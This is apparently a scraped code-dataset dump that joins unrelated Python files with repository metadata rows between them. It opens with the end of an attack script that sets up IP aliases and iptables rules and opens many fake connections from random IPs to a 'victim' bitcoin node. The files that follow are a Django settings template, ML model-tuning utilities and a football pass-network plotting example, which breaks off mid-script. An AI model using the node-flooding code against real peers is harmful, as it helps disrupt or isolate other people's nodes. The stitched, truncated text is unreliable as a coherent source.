def backup_iptables():
terminal(f'iptables-save > {iptables_file_path}')
# Restore the backup of the iptable rules
def cleanup_iptables():
if(os.path.exists(iptables_file_path)):
print('Cleaning up iptables configuration')
terminal(f'iptables-restore < {iptables_file_path}')
os.remove(iptables_file_path)
# Remove all ip aliases that were created by the script
def cleanup_ipaliases():
for i in range(0, len(identity_address)):
try:
ip = identity_address[i][0]
interface = identity_interface[i]
print(f'Cleaning up IP alias {ip} on {interface}')
terminal(f'sudo ifconfig {interface} {ip} down')
except: pass
# This function is ran when the script is stopped
def on_close():
print('Closing open sockets')
for socket in identity_socket:
socket.close()
cleanup_ipaliases()
cleanup_iptables()
print('Cleanup complete. Goodbye.')
#print('Verifying that internet works...')
#if not internet_is_active():
# reset_network()
# This is the first code to run
if __name__ == '__main__':
global alias_num
alias_num = 0 # Increments each alias
initialize_network_info()
initialize_bitcoin_info()
atexit.register(on_close) # Make on_close() run when the script terminates
cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring
backup_iptables()
# Create the connections
for i in range(1, num_identities + 1):
try:
make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
except ConnectionRefusedError:
print('Connection was refused. The victim\'s node must not be running.')
print(f'Successful connections: {len(identity_address)}\n')
# Prevent the script from terminating when the sniff function is still active
while 1:
time.sleep(60)
| 34.497006 | 359 | 0.743881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5,543 | 0.48108 |
4c6289a028d756ccd03ac220d11a9d33117ee573 | 6,530 | py | Python | djcorsche/settings_default.py | carthage-college/django-djcorsche | c43db6e634f5b3fc9c8b0cff80ced8382ca6643c | [
"BSD-3-Clause"
] | null | null | null | djcorsche/settings_default.py | carthage-college/django-djcorsche | c43db6e634f5b3fc9c8b0cff80ced8382ca6643c | [
"BSD-3-Clause"
] | null | null | null | djcorsche/settings_default.py | carthage-college/django-djcorsche | c43db6e634f5b3fc9c8b0cff80ced8382ca6643c | [
"BSD-3-Clause"
] | null | null | null | """
Django settings for project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Debug
#DEBUG = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
INFORMIX_DEBUG = "debug"
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
SECRET_KEY = ''
ALLOWED_HOSTS = []
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
SERVER_URL = ""
API_URL = "%s/%s" % (SERVER_URL, "api")
LIVEWHALE_API_URL = "https://%s" % (SERVER_URL)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
ROOT_DIR = os.path.dirname(__file__)
ROOT_URL = "/djskeletor/"
ROOT_URLCONF = 'djskeletor.core.urls'
WSGI_APPLICATION = 'djskeletor.wsgi.application'
MEDIA_ROOT = ''
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ''
STATIC_URL = "/static/"
STATICFILES_DIRS = ()
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
DATABASES = {
'default': {
'HOST': '127.0.0.1',
'PORT': '3306',
'NAME': 'django_djskeletor',
'ENGINE': 'django.db.backends.mysql',
#'ENGINE': 'django.db.backends.dummy',
'USER': '',
'PASSWORD': ''
},
}
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.formtools',
'django.contrib.humanize',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'djskeletor',
'djskeletor.core',
'djskeletor.myapp',
'djtools',
)
MIDDLEWARE_CLASSES = (
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.cache.FetchFromCacheMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# the following should be uncommented unless you are
# embedding your apps in iframes
#'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# template stuff
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
"/data2/django_projects/djskeletor/templates/",
"/data2/django_templates/djkorra/",
"/data2/django_templates/djcher/",
"/data2/django_templates/",
)
TEMPLATE_CONTEXT_PROCESSORS = (
"djtools.context_processors.sitevars",
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.media",
)
# caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
#'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#'LOCATION': '127.0.0.1:11211',
#'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
#'LOCATION': '/var/tmp/django_djskeletor_cache',
#'TIMEOUT': 60*20,
#'KEY_PREFIX': "DJSKELETOR_",
#'OPTIONS': {
# 'MAX_ENTRIES': 80000,
#}
}
}
CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
# LDAP Constants
LDAP_SERVER = ''
LDAP_SERVER_PWM = ''
LDAP_PORT = ''
LDAP_PORT_PWM = ''
LDAP_PROTOCOL = ""
LDAP_PROTOCOL_PWM = ""
LDAP_BASE = ""
LDAP_USER = ""
LDAP_PASS = ""
LDAP_EMAIL_DOMAIN = ""
LDAP_OBJECT_CLASS = ""
LDAP_OBJECT_CLASS_LIST = []
LDAP_GROUPS = {}
LDAP_RETURN = []
LDAP_RETURN_PWM = []
LDAP_ID_ATTR = ""
LDAP_CHALLENGE_ATTR = ""
# auth backends
AUTHENTICATION_BACKENDS = (
'djauth.ldapBackend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/djskeletor/accounts/login/'
LOGIN_REDIRECT_URL = '/djskeletor/'
USE_X_FORWARDED_HOST = True
#SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_COOKIE_DOMAIN=".carthage.edu"
SESSION_COOKIE_NAME ='django_djskeletor_cookie'
SESSION_COOKIE_AGE = 86400
# SMTP settings
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_FAIL_SILENTLY = False
DEFAULT_FROM_EMAIL = ''
SERVER_EMAIL = ''
SERVER_MAIL=''
# logging
LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/")
LOG_FILENAME = LOG_FILEPATH + "debug.log"
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level':'DEBUG',
'class':'django.utils.log.NullHandler',
},
'logfile': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename': LOG_FILENAME,
'maxBytes': 50000,
'backupCount': 2,
'formatter': 'standard',
},
'console':{
'level':'INFO',
'class':'logging.StreamHandler',
'formatter': 'standard'
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'include_html': True,
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'djskeletor': {
'handlers':['logfile'],
'propagate': True,
'level':'DEBUG',
},
'django': {
'handlers':['console'],
'propagate': True,
'level':'WARN',
},
'django.db.backends': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| 27.552743 | 96 | 0.620214 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,590 | 0.54977 |
4c64de6df990440fb9bf292eb702bdb614dfcfae | 22,653 | py | Python | utils.py | atward424/ASCVD_ML | 39404dd5f50a527576b91e8f53f5157f76382712 | [
"Apache-2.0"
] | 1 | 2021-04-08T07:05:18.000Z | 2021-04-08T07:05:18.000Z | utils.py | atward424/ASCVD_ML | 39404dd5f50a527576b91e8f53f5157f76382712 | [
"Apache-2.0"
] | null | null | null | utils.py | atward424/ASCVD_ML | 39404dd5f50a527576b91e8f53f5157f76382712 | [
"Apache-2.0"
] | 1 | 2021-04-08T07:07:53.000Z | 2021-04-08T07:07:53.000Z | import numpy as np
import pandas as pd
import scipy.stats as st
#from medical_ML import Experiment
import matplotlib.pyplot as plt
import xgboost as xgb
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.dummy import DummyClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression, Lasso
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn import linear_model
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.dummy import DummyRegressor
def split_cohort(datafile, to_exclude = None, test_ind_col = None, drop = 'some'):
""" Load and clean the dataset
"""
if isinstance(datafile, str):
data = pd.read_csv(datafile)
else:
data = datafile
test_data = None
if to_exclude is not None:
for k in to_exclude.keys():
if k == 'race':
data = data[data[k].isin(to_exclude[k])]
elif k == 'agebl':
data = data[data[k] >= to_exclude[k]]
elif to_exclude[k]:
data = data[data[k] == 0]
if drop == 'some':
data = data.drop(k, axis = 1)
if drop == 'all':
if (k != 'race') & (k != 'agebl'):
data = data.drop(k, axis = 1)
# self.data = self.data[self.data['year'] <= 2010]
# self.data = self.data.drop(['year'], axis = 1)
if test_ind_col is not None:
test_data = data[data[test_ind_col] == 1]
test_data = test_data.drop(test_ind_col, axis = 1)
data = data[data[test_ind_col] == 0]
data = data.drop(test_ind_col, axis = 1)
return(data, test_data)
def calc_auc_conf_interval(AUC, N1, N2, ci = 0.95):
# from https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/PASS/Confidence_Intervals_for_the_Area_Under_an_ROC_Curve.pdf
zsc = st.norm.ppf(1 - (1-ci)/2.)
q1 = AUC / (2 - AUC)
q2 = (2 * AUC * AUC) / (1 + AUC)
numerator = AUC * (1 - AUC) + (N1 - 1) * (q1 - AUC * AUC) + (N2 - 1) * (q2 - AUC * AUC)
denom = N1 * N2
se_AUC = np.sqrt(numerator / denom)
return (se_AUC, AUC - zsc * se_AUC, AUC, AUC + zsc * se_AUC)
def load_models_and_parameters_default():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'logreg': (LogisticRegression(),
{}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {"C":[0.001, 0.01,0.1, 1]}),
'lasso2': (LogisticRegression(penalty = 'l1',solver ='saga'),
{}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [800],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
'xgb': (xgb.XGBClassifier(),
{}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
'gbm': (GradientBoostingClassifier(),
{}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 400, 800],
# 'learning_rate': [0.03, 0.01, 0.001],
# 'max_depth': [4,5,6,8],
# 'subsample': [0.85],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
def load_models_and_parameters():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
'logreg': (LogisticRegression(),
{"class_weight": [None],
"C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {}), #, "balanced"
# # "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
'lasso2': (LogisticRegression(penalty = 'l1', solver ='saga'),
{"C":[0.001, 0.01,0.1, 1]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [500, 1000],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
# 'xgb': (xgb.XGBClassifier(),
# {}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
'gbm': (GradientBoostingClassifier(),
{'n_estimators': [100, 200, 400, 800],
'learning_rate': [0.03, 0.01, 0.001],
'max_depth': [4,5,6,8],
'subsample': [0.85],
'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
def calc_metrics(y_true, y_pred, return_all = False):
res_df = pd.DataFrame({'y_true' : y_true,
'y_pred': y_pred}, columns = ['y_pred', 'y_true'])
res_df = res_df.sort_values(by = 'y_pred')
res_df['TN'] = (res_df.y_true == 0).cumsum()
res_df['FN'] = (res_df.y_true == 1).cumsum()
if return_all == False:
res_df = pd.concat([pd.DataFrame({'y_true' : -1,
'y_pred': -1,
"TN": 0,
"FN":0},
index = [-1],
columns = ['y_pred', 'y_true', 'TN', "FN"]),
res_df], axis = 0)
res_df['TP'] = (res_df.y_true == 1).sum() - res_df['FN']
res_df['FP'] = (res_df.y_true == 0).sum() - res_df['TN']
res_df['sens'] = res_df.TP / (res_df.TP + res_df.FN)
res_df['spec'] = res_df.TN / (res_df.TN + res_df.FP)
res_df['PPV'] = res_df.TP / (res_df.TP + res_df.FP)
res_df['accuracy'] = (res_df.TP + res_df.TN) / (res_df.shape[0])
res_df['f1_score'] = 2 * res_df.PPV * res_df.sens / (res_df.PPV + res_df.sens)
res_df['youdens_index'] = res_df.sens + res_df.spec - 1
# remove predictions which represent non-separable decision points (i.e., y_pred is equal)
if return_all == False:
res_df = res_df[(res_df.y_pred.duplicated('last') == False)]
return(res_df)
def set_up_plot():
# plt.grid(True, 'major', color = 'w', linewidth = 0.7)
plt.grid(True, 'major', color = '0.85', linewidth = 0.7)
plt.grid(True, 'minor', color = "0.92", linestyle = '-', linewidth = 0.7)
ax = plt.gca()
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
ax.set_axisbelow(True)
# ax.patch.set_facecolor("0.85")
def train_val(RESULT_DIR, alldata, models, label = 'Label',
cv = 5,
score_name = "AUC",
to_exclude = None,
test_ind_col = None, oversample_rate = 1,
imputer = 'iterative', add_missing_flags = True):
from medical_ML import Experiment
print('\n\n' + 'STARTING EXPERIMENT FOR ' + RESULT_DIR + '\n\n')
expt = Experiment(alldata, label = label,
to_exclude = to_exclude,
test_ind_col = test_ind_col, drop = 'all',
result_dir = RESULT_DIR)
expt.predict_models_from_groups(0, models, cv=cv, score_name=score_name, mode='classification',
oversample_rate = oversample_rate,
imputer = imputer, add_missing_flags = add_missing_flags)
expt.save_and_plot_results(models,
cv = cv, test = False)
return(expt) | 48.821121 | 147 | 0.382201 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12,622 | 0.557189 |
4c6c5b767e3d2e7d380bed49701614a213de873b | 8,063 | py | Python | examples/plots/plot_pass_network.py | DymondFormation/mplsoccer | 544300857ec5936781e12fda203cf2df8a3d00b9 | [
"MIT"
] | null | null | null | examples/plots/plot_pass_network.py | DymondFormation/mplsoccer | 544300857ec5936781e12fda203cf2df8a3d00b9 | [
"MIT"
] | null | null | null | examples/plots/plot_pass_network.py | DymondFormation/mplsoccer | 544300857ec5936781e12fda203cf2df8a3d00b9 | [
"MIT"
] | null | null | null | """
============
Pass Network
============
This example shows how to plot passes between players in a set formation.
"""
import pandas as pd
from mplsoccer.pitch import Pitch
from matplotlib.colors import to_rgba
import numpy as np
from mplsoccer.statsbomb import read_event, EVENT_SLUG
##############################################################################
# Set team and match info, and get event and tactics dataframes for the defined match_id
match_id = 15946
team = 'Barcelona'
opponent = 'Alavés (A), 2018/19 La Liga'
event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False)
players = event_dict['tactics_lineup']
events = event_dict['event']
##############################################################################
# Adding on the last tactics id and formation for the team for each event
events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[
events.tactics_formation.notnull(), 'id']
events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[
'tactics_id', 'tactics_formation']].ffill()
##############################################################################
# Add the abbreviated player position to the players dataframe
formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB',
8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM',
14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM',
20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'}
players['position_abbreviation'] = players.player_position_id.map(formation_dict)
##############################################################################
# Add on the subsitutions to the players dataframe, i.e. where players are subbed on
# but the formation doesn't change
sub = events.loc[events.type_name == 'Substitution',
['tactics_id', 'player_id', 'substitution_replacement_id',
'substitution_replacement_name']]
players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'),
on=['id', 'player_id'], how='inner', validate='1:1')
players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']]
.rename({'substitution_replacement_id': 'player_id'}, axis='columns'))
players = pd.concat([players, players_sub])
players.rename({'id': 'tactics_id'}, axis='columns', inplace=True)
players = players[['tactics_id', 'player_id', 'position_abbreviation']]
##############################################################################
# Add player position information to the events dataframe
# add on the position the player was playing in the formation to the events dataframe
events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1')
# add on the position the receipient was playing in the formation to the events dataframe
events = events.merge(players.rename({'player_id': 'pass_recipient_id'},
axis='columns'), on=['tactics_id', 'pass_recipient_id'],
how='left', validate='m:1', suffixes=['', '_receipt'])
##############################################################################
# Create dataframes for passes and player locations
# get a dataframe with all passes
mask_pass = (events.team_name == team) & (events.type_name == 'Pass')
to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id',
'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation',
'position_abbreviation', 'position_abbreviation_receipt']
passes = events.loc[mask_pass, to_keep].copy()
print('Formations used by {} in match: '.format(team), passes['tactics_formation'].unique())
##############################################################################
# Filter passes by chosen formation, then group all passes and receipts to
# calculate avg x, avg y, count of events for each slot in the formation
formation = 433
passes_formation = passes[(passes.tactics_formation == formation) &
(passes.position_abbreviation_receipt.notnull())].copy()
passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy()
recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy()
# rename columns to match those in passer_passes
recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation',
'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True)
# create a new dataframe containing all individual passes and receipts from passes_formation
appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True)
average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({
'x': ['mean'], 'y': ['mean', 'count']})
average_locs_and_count.columns = ['x', 'y', 'count']
##############################################################################
# Group the passes by unique pairings of players and add the avg player positions to this dataframe
# calculate the number of passes between each position (using min/ max so we get passes both ways)
passes_formation['pos_max'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].max(axis='columns')
passes_formation['pos_min'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].min(axis='columns')
passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index()
passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True)
# add on the location of each player so we have the start and end positions of the lines
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True)
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True,
suffixes=['', '_end'])
##############################################################################
# Calculate the line width and marker sizes relative to the largest counts
max_line_width = 18
max_marker_size = 3000
passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width
